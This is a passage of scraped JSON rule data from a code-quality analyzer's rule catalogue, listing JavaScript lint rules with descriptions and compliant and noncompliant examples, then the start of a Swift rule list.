array;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3516","repo":"javascript","name":"Function returns should not be invariant","htmlDesc":"<p>When a function is designed to return an invariant value, it may be poor design, but it shouldn't adversely affect the outcome of your program.\nHowever, when it happens on all paths through the logic, it is likely a mistake.<\/p>\n<p>This rule raises an issue when a function contains several <code>return<\/code> statements that all return the same value.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(a) { \/\/ Noncompliant\n let b = 12;\n if (a) {\n return b;\n }\n return b;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3523","repo":"javascript","name":"Function constructors should not be used","htmlDesc":"<p>In addition to being obtuse from a syntax perspective, function constructors are also dangerous: their execution evaluates the constructor's string\narguments similar to the way <code>eval<\/code> works, which could expose your program to random, unintended code which can be both slow and a security\nrisk.<\/p>\n<p>In general it is better to avoid it altogether, particularly when used to parse JSON data. You should use ECMAScript 5's built-in JSON functions or\na dedicated library.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar obj = new Function(\"return \" + data)(); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = JSON.parse(data);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Function calls where the argument is a string literal (e.g. <code>(Function('return this'))()<\/code>) are ignored. <\/p>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S3524","repo":"javascript","name":"Braces and parentheses should be used consistently with arrow functions","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule raises an issue when the use of parentheses with an arrow function does\nnot conform to the configured requirements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the configured defaults forbidding parentheses<\/p>\n<pre>\nvar foo = (a) => { \/* ... *\/ }; \/\/ Noncompliant; remove parens from arg\nvar bar = (a, b) => { return 0; }; \/\/ Noncompliant; remove curly braces from body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar foo = a => { \/* ... *\/ };\nvar bar = (a, b) => 0;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[{"key":"body_braces","htmlDesc":"True to require curly braces around function body. False to forbid them for single-return bodies.","defaultValue":"false","type":"BOOLEAN"},{"key":"parameter_parens","htmlDesc":"True to require parentheses around parameters. False to forbid them for single parameter.","defaultValue":"false","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"javascript:S3525","repo":"javascript","name":"Class methods should be used instead of \"prototype\" assignments","htmlDesc":"<p>Originally JavaScript didn't support <code>class<\/code>es, and class-like behavior had to be kludged using things like <code>prototype<\/code>\nassignments for \"class\" functions. Fortunately, ECMAScript 2015 added classes, so any lingering <code>prototype<\/code> uses should be converted to\ntrue <code>class<\/code>es. The new syntax is more expressive and clearer, especially to those with experience in other languages.<\/p>\n<p>Specifically, with ES2015, you should simply declare a <code>class<\/code> and define its methods inside the class declaration.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyNonClass(initializerArgs = []) {\n this._values = [...initializerArgs];\n}\n\nMyNonClass.prototype.doSomething = function () { \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n constructor(initializerArgs = []) {\n this._values = [...initializerArgs];\n }\n\n doSomething() {\n \/\/...\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3533","repo":"javascript","name":"\"import\" should be used to include external code","htmlDesc":"<p>Before ECMAScript 2015, module management had to be ad-hoc or provided by 3rd-party libraries such as Node.js, Webpack, or RequireJS. Fortunately,\nES2015, provides language-standard mechanisms for module management, <code>import<\/code> and <code>export<\/code>, and older usages should be\nconverted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ circle.js\nexports.area = function (r) {\n return PI * r * r;\n};\n\n\/\/ foo.js\ndefine([\".\/cart\", \".\/horse\"], function(cart, horse) { \/\/ Noncompliant\n \/\/ ...\n});\n\n\/\/ bar.js\nconst circle = require('.\/circle.js'); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ circle.js\nlet area = function (r) {\n return PI * r * r;\n}\nexport default area;\n\n\/\/ foo.js\nimport cart from \".\/cart.js\";\nimport horse from \".\/horse.js\";\n\n\/\/ bar.js\nimport circle from \".\/circle.js\"\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3579","repo":"javascript","name":"Array indexes should be numeric","htmlDesc":"<p>JavaScript is flexible enough to allow you to store values in an array with either numeric or named indexes. That is, it supports associative\narrays. But creating and populating an object in JavaScript is just as easy as an array, and more reliable if you need named members.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet arr = [];\narr[0] = 'a';\narr['name'] = 'bob'; \/\/ Noncompliant\narr[1] = 'foo';\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet obj = {\n name: 'bob',\n arr: ['a', 'foo']\n};\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3616","repo":"javascript","name":"Comma and logical OR operators should not be used in switch cases","htmlDesc":"<p>The comma operator (<code>,<\/code>) evaluates its operands, from left to right, and returns the second one. That's useful in some situations, but\njust wrong in a <code>switch<\/code> <code>case<\/code>. You may think you're compactly handling multiple values in the case, but only the last one in\nthe comma-list will ever be handled. The rest will fall through to the default.<\/p>\n<p>Similarly the logical OR operator (<code>||<\/code>) will not work in a <code>switch<\/code> <code>case<\/code>, only the first argument will be\nconsidered at execution time.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch a {\n case 1,2: \/\/ Noncompliant; only 2 is ever handled by this case\n doTheThing(a);\n case 3 || 4: \/\/ Noncompliant; only '3' is handled\n doThatThing(a);\n case 5:\n doTheOtherThing(a);\n default:\n console.log(\"Neener, neener!\"); \/\/ this happens when a==1 or a == 4\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch a {\n case 1:\n case 2:\n doTheThing(a);\n case 3:\n case 4:\n doThatThing(a);\n case 5:\n doTheOtherThing(a);\n default:\n console.log(\"Neener, neener!\");\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3686","repo":"javascript","name":"Functions should not be called both with and without \"new\"","htmlDesc":"<p>Constructor functions, which create new object instances, must only be called with <code>new<\/code>. Non-constructor functions must not. Mixing\nthese two usages could lead to unexpected results at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction getNum() {\n return 5;\n}\n\nfunction Num(numeric, alphabetic) {\n this.numeric = numeric;\n this.alphabetic = alphabetic;\n}\n\nvar myFirstNum = getNum();\nvar my2ndNum = new getNum(); \/\/ Noncompliant. An empty object is returned, NOT 5\n\nvar myNumObj1 = new Num();\nvar myNumObj2 = Num(); \/\/ Noncompliant. undefined is returned, NOT an object\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3699","repo":"javascript","name":"The output of functions that don't return anything should not be used","htmlDesc":"<p>If a function does not return anything, it makes no sense to use its output. Specifically, passing it to another function, or assigning its\n\"result\" to a variable is probably a bug because such functions return <code>undefined<\/code>, which is probably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n}\n\na = foo();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo() {\n}\n\nfoo();\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3735","repo":"javascript","name":"\"void\" should not be used","htmlDesc":"<p>The <code>void<\/code> operator evaluates its argument and unconditionally returns <code>undefined<\/code>. It can be useful in pre-ECMAScript 5\nenvironments, where <code>undefined<\/code> could be reassigned, but generally, its use makes code harder to understand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvoid (function() {\n ...\n}());\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n(function() {\n ...\n}());\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>void 0<\/code> is used in place of <code>undefined<\/code>. <\/p>\n<pre>\nif (parameter === void 0) {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3758","repo":"javascript","name":"Values not convertible to numbers should not be used in numeric comparisons","htmlDesc":"<p>In a Zen-like manner, <code>NaN<\/code> isn't equal to anything, even itself. So comparisons (<code>>, <, >=, <=<\/code>) where one\noperand is <code>NaN<\/code> or evaluates to <code>NaN<\/code> always return <code>false<\/code>. Specifically, <code>undefined<\/code> and objects that\ncannot be converted to numbers evaluate to <code>NaN<\/code> when used in numerical comparisons.<\/p>\n<p>This rule raises an issue when there is at least one path through the code where one of the operands to a comparison is <code>NaN<\/code>,\n<code>undefined<\/code> or an <code>Object<\/code> which cannot be converted to a number.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x; \/\/ x is currently \"undefined\"\nif (someCondition()) {\n x = 42;\n}\n\nif (42 > x) { \/\/ Noncompliant; \"x\" might still be \"undefined\"\n doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj > 24) { \/\/ Noncompliant\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x;\nif (someCondition()) {\n x = 42;\n} else {\n x = foo();\n}\n\nif (42 > x) {\n doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj.prop > 24) {\n doSomething();\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3776","repo":"javascript","name":"Cognitive Complexity of functions should not be too high","htmlDesc":"<p>Cognitive Complexity is a measure of how hard the control flow of a function is to understand. Functions with high Cognitive Complexity will be\ndifficult to maintain.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/redirect.sonarsource.com\/doc\/cognitive-complexity.html\">Cognitive Complexity<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"threshold","htmlDesc":"The maximum authorized complexity.","defaultValue":"15","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S3782","repo":"javascript","name":"Arguments to built-in functions should match documented types","htmlDesc":"<p>The types of the arguments to built-in functions are specified in the JavaScript language specifications. Calls to these functions should conform\nto the documented types, otherwise the result will most likely not be what was expected (e.g.: the call would always return <code>false<\/code>).<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x < 0.0042);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x) < 0.0042;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3785","repo":"javascript","name":"\"in\" should not be used with primitive types","htmlDesc":"<p>The <code>in<\/code> operator tests whether the specified property is in the specified object.<\/p>\n<p>If the right operand is a of primitive type (i.e., not an object) the <code>in<\/code> operator raises a <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = \"Foo\";\n\"length\" in x; \/\/ Noncompliant: TypeError\n0 in x; \/\/ Noncompliant: TypeError\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = new String(\"Foo\");\n\"length\" in x; \/\/ true\n0 in x; \/\/ true\n\"foobar\" in x; \/\/ false\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3786","repo":"javascript","name":"Template literal placeholder syntax should not be used in regular strings","htmlDesc":"<p>JavaScript allows developers to embed variables or expressions in strings using template literals, instead of string concatenation. This is done by\nusing expressions like <code>${variable} <\/code> in a string between two back-ticks (<code>`<\/code>).<\/p>\n<p>When used in a regular string literal (between double or single quotes) the template will not be evaluated and will be used as a literal, which is\nprobably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(\"Today is ${date}\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconsole.log(`Today is ${date}`);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3796","repo":"javascript","name":"Callbacks of array methods should have return statements","htmlDesc":"<p>Arrays in JavaScript have several methods for filtering, mapping or folding that require a callback. Not having a return statement in such a\ncallback function is most likely a mistake.<\/p>\n<p>This rule applies for the following methods of an array:<\/p>\n<ul>\n <li> <code>Array.from<\/code> <\/li>\n <li> <code>Array.prototype.every<\/code> <\/li>\n <li> <code>Array.prototype.filter<\/code> <\/li>\n <li> <code>Array.prototype.find<\/code> <\/li>\n <li> <code>Array.prototype.findIndex<\/code> <\/li>\n <li> <code>Array.prototype.map<\/code> <\/li>\n <li> <code>Array.prototype.reduce<\/code> <\/li>\n <li> <code>Array.prototype.reduceRight<\/code> <\/li>\n <li> <code>Array.prototype.some<\/code> <\/li>\n <li> <code>Array.prototype.sort<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n a.concat(b);\n}); \/\/ Noncompliant: No return statement\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n return a.concat(b);\n});\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3799","repo":"javascript","name":"Destructuring patterns should not be empty","htmlDesc":"<p>Destructuring is a convenient way of extracting multiple values from data stored in (possibly nested) objects and arrays. However, it is possible\nto create an empty pattern that has no effect. When empty curly braces or brackets are used to the right of a property name most of the time the\nintent was to use a default value instead.<\/p>\n<p>This rule raises an issue when empty destructuring pattern is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar {a: {}, b} = myObj; \/\/ Noncompliant\nfunction foo({first: [], second}) { \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar {a = {}, b} = myObj;\nfunction foo({first = [], second}) {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3828","repo":"javascript","name":"\"yield\" expressions should not be used outside generators","htmlDesc":"<p>The <code>yield<\/code> keyword is used in a generator function to return an <code>IteratorResult<\/code> to the caller. It has no other purpose, and\nif found outside such a function will raise a <code>ReferenceError<\/code> because it is then treated as an identifier.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n for (var i = 0; i < 5; i++) {\n yield i * 2;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction * foo() {\n for (var i = 0; i < 5; i++) {\n yield i * 2;\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3834","repo":"javascript","name":"\"Symbol\" should not be used as a constructor","htmlDesc":"<p><code>Symbol<\/code> is a primitive type introduced in ECMAScript2015. Its instances are mainly used as unique property keys.<\/p>\n<p>An instance can only be created by using <code>Symbol<\/code> as a function. Using <code>Symbol<\/code> with the <code>new<\/code> operator will raise\na <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst sym = new Symbol(\"foo\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst sym = Symbol(\"foo\");\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3854","repo":"javascript","name":"super() should be invoked appropriately","htmlDesc":"<p>There are situations where <code>super()<\/code> must be invoked and situations where <code>super()<\/code> cannot be invoked.<\/p>\n<p>The basic rule is: a constructor in a non-derived class cannot invoke <code>super()<\/code>; a constructor in a derived class must invoke\n<code>super()<\/code>.<\/p>\n<p>Furthermore:<\/p>\n<p>- <code>super()<\/code> must be invoked before the <code>this<\/code> and <code>super<\/code> keywords can be used.<\/p>\n<p>- <code>super()<\/code> must be invoked with the same number of arguments as the base class' constructor.<\/p>\n<p>- <code>super()<\/code> can only be invoked in a constructor - not in any other method.<\/p>\n<p>- <code>super()<\/code> cannot be invoked multiple times in the same constructor.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Animal {\n constructor() {\n super(); \/\/ Noncompliant, super() cannot be invoked in a base class\n }\n\n doSomething() {\n }\n}\n\nclass Dog extends Animal {\n constructor(name) {\n this.name = name;\n super.doSomething();\n super(); \/\/ Noncompliant, super() must be invoked before \"this\" or \"super\" is used\n }\n\n doSomething() {\n super(); \/\/ Noncompliant, super() cannot be invoked outside of a constructor\n }\n}\n\nclass Labrador extends Dog {\n constructor(name) {\n super(); \/\/ Noncompliant, super() must be invoked with one argument\n }\n}\n\nclass GermanShepherd extends Dog {\n constructor(name) {\n } \/\/ Noncompliant, super() must be invoked in constructor of derived class\n}\n\nclass FilaBrasileiro extends Dog {\n constructor(name) {\n super(name);\n super(name); \/\/ Noncompliant, super() can only be invoked once\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Animal {\n constructor() {\n }\n\n doSomething() {\n }\n}\n\nclass Dog extends Animal {\n constructor(name) {\n super();\n this.name = name;\n super.doSomething();\n }\n\n doSomething() {\n }\n}\n\nclass Labrador extends Dog {\n constructor(name) {\n super(name);\n }\n}\n\nclass GermanShepherd extends Dog {\n constructor(name) {\n super(name);\n }\n}\n\nclass FilaBrasileiro extends Dog {\n constructor(name) {\n super(name);\n }\n}\n<\/pre>\n<h2>Known Limitations<\/h2>\n<ul>\n <li>False negatives: some issues are not raised if the base class is not defined in the same file as the current class.<\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3923","repo":"javascript","name":"All branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having all branches in a <code>switch<\/code> or <code>if<\/code> chain with the same implementation is an error. Either a copy-paste error was made\nand something different should be executed, or there shouldn't be a <code>switch<\/code>\/<code>if<\/code> chain at all. Note that this rule does not\napply to <code>if<\/code> chains without <code>else<\/code>s, or to <code>switch<\/code>es without <code>default<\/code> clauses.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (b == 0) { \/\/ Noncompliant\n doOneMoreThing();\n}\nelse {\n doOneMoreThing();\n}\n\nlet a = (b == 0) ? getValue() : getValue(); \/\/ Noncompliant\n\nswitch (i) { \/\/ Noncompliant\n case 1:\n doSomething();\n break;\n case 2:\n doSomething();\n break;\n case 3:\n doSomething();\n break;\n default:\n doSomething();\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S888","repo":"javascript","name":"Equality operators should not be used in \"for\" loop termination conditions","htmlDesc":"<p>Testing <code>for<\/code> loop termination using an equality operator (<code>==<\/code> and <code>!=<\/code>) is dangerous, because it could set up an\ninfinite loop. Using a broader relational operator instead casts a wider net, and makes it harder (but not impossible) to accidentally write an\ninfinite loop.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 1; i != 10; i += 2) \/\/ Noncompliant. Infinite; i goes from 9 straight to 11.\n{\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 1; i <= 10; i += 2) \/\/ Compliant\n{\n \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Equality operators are ignored if the loop counter is not modified within the body of the loop and either:<\/p>\n<ul>\n <li> starts below the ending value and is incremented by 1 on each iteration. <\/li>\n <li> starts above the ending value and is decremented by 1 on each iteration. <\/li>\n<\/ul>\n<p>Equality operators are also ignored when the test is against <code>null<\/code>.<\/p>\n<pre>\nfor (var i = 0; arr[i] != null; i++) {\n \/\/ ...\n}\n\nfor (var i = 0; (item = arr[i]) != null; i++) {\n \/\/ ...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 6-5-2 <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/835\">MITRE, CWE-835<\/a> - Loop with Unreachable Exit Condition ('Infinite Loop') <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/EwDJAQ\">CERT, MSC21-C.<\/a> - Use robust loop termination conditions <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/GwDJAQ\">CERT, MSC21-CPP.<\/a> - Use inequality to terminate a loop whose counter changes\n by more than one <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:StrictMode","repo":"javascript","name":"\"strict\" mode should be used with caution","htmlDesc":"<p>Even thought it may be a good practice to enforce JavaScript strict mode, doing so could result in unexpected behaviors on browsers that do not\nsupport it yet. Using this feature should therefore be done with caution and with full knowledge of the potential consequences on browsers that do not\nsupport it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction strict() {\n 'use strict';\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:SwitchWithoutDefault","repo":"javascript","name":"\"switch\" statements should end with \"default\" clauses","htmlDesc":"<p>The requirement for a final <code>default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain a\nsuitable comment as to why no action is taken.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (param) { \/\/missing default clause\n case 0:\n doSomething();\n break;\n case 1:\n doSomethingElse();\n break;\n}\n\nswitch (param) {\n default: \/\/ default clause should be the last one\n error();\n break;\n case 0:\n doSomething();\n break;\n case 1:\n doSomethingElse();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (param) {\n case 0:\n doSomething();\n break;\n case 1:\n doSomethingElse();\n break;\n default:\n error();\n break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:UnusedVariable","repo":"javascript","name":"Unused local variables and functions should be removed","htmlDesc":"<p>If a local variable or a local function is declared but not used, it is dead code and should be removed. Doing so will improve maintainability\nbecause developers will not wonder what the variable or function is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n var seconds = 0; \/\/ seconds is never used\n return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n return hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:VariableShadowing","repo":"javascript","name":"Variables should not be shadowed","htmlDesc":"<p>Overriding a variable declared in an outer scope can strongly impact the readability, and therefore the maintainability, of a piece of code.\nFurther, it could lead maintainers to introduce bugs because they think they're using one variable but are really using another.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nshow: function(point, element) {\n if (!this.drops.length) return;\n var drop, affected = [];\n this.drops.each( function(drop) { \/\/ Non-Compliant; defines a new 'drop' parameter\n if(Droppables.isAffected(point, element, drop))\n affected.push(drop);\n });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nshow: function(point, element) {\n if (!this.drops.length) return;\n var drop, affected = [];\n this.drops.each( function(aDrop) {\n if(Droppables.isAffected(point, element, aDrop))\n affected.push(aDrop);\n });\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 5.2 - Identifiers in an inner scope shall not use the same name as an identifier in an outer scope, and therefore hide that\n identifier <\/li>\n <li> MISRA C++:2008, 2-10-2 - Identifiers declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n <li> MISRA C:2012, 5.3 - An identifier declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/VwE\">CERT, DCL01-C.<\/a> - Do not reuse variable names in subscopes <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/cwAhAQ\">CERT, DCL01-CPP.<\/a> - Do not reuse variable names in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:WithStatement","repo":"javascript","name":"\"with\" statements should not be used","htmlDesc":"<p>The use of the <code>with<\/code> keyword produces an error in JavaScript strict mode code. However, that's not the worst that can be said against\n<code>with<\/code>.<\/p>\n<p>Using <code>with<\/code> allows a short-hand access to an object's properties - assuming they're already set. But use <code>with<\/code> to access\nsome property not already set in the object, and suddenly you're catapulted out of the object scope and into the global scope, creating or overwriting\nvariables there. Since the effects of <code>with<\/code> are entirely dependent on the object passed to it, <code>with<\/code> can be dangerously\nunpredictable, and should never be used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n y: 1\n}\n\nwith (foo) { \/\/ Noncompliant\n y = 4; \/\/ updates foo.x\n x = 3; \/\/ does NOT add a foo.x property; updates x var in outer scope\n}\nprint(foo.x + \" \" + x); \/\/ shows: undefined 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n y: 1\n}\n\nfoo.y = 4;\nfoo.x = 3;\n\nprint(foo.x + \" \" + x); \/\/ shows: 3 a\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"}],"language":"js","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};- Exclude checks
BUG found Open
Open
window.data = {"total":58,"p":1,"ps":500,"rules":[{"key":"common-swift:DuplicatedBlocks","repo":"common-swift","name":"Source files should not have any duplicated blocks","htmlDesc":"An issue is created on a file as soon as there is at least one block of duplicated code on this file","status":"READY","tags":["rank2"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"common-swift:FailedUnitTests","repo":"common-swift","name":"Failed unit tests should be fixed","htmlDesc":"Test failures or errors generally indicate that regressions have been introduced. Those tests should be handled as soon as possible to reduce the cost to fix the corresponding regressions.","status":"READY","tags":["rank5"],"langName":"Swift","params":[],"type":"BUG"},{"key":"common-swift:SkippedUnitTests","repo":"common-swift","name":"Skipped unit tests should be either removed or fixed","htmlDesc":"Skipped unit tests are considered as dead code. Either they should be activated again (and updated) or they should be removed.","status":"READY","tags":["rank5"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S100","repo":"swift","name":"Function names should comply with a naming convention","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks that all function names match a provided regular expression.<\/p>","status":"READY","tags":["rank1"],"langName":"Swift","params":[{"key":"format","htmlDesc":"Regular expression used to check the function names against","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"swift:S101","repo":"swift","name":"Class names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all class\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass my_class {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Swift","params":[{"key":"format","htmlDesc":"Regular expression used to check the class names against","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"swift:S103","repo":"swift","name":"Lines should not be too long","htmlDesc":"<p>Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.<\/p>","status":"READY","tags":["rank4"],"langName":"Swift","params":[{"key":"maximumLineLength","htmlDesc":"The maximum authorized line length.","defaultValue":"120","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"swift:S1066","repo":"swift","name":"Collapsible \"if\" statements should 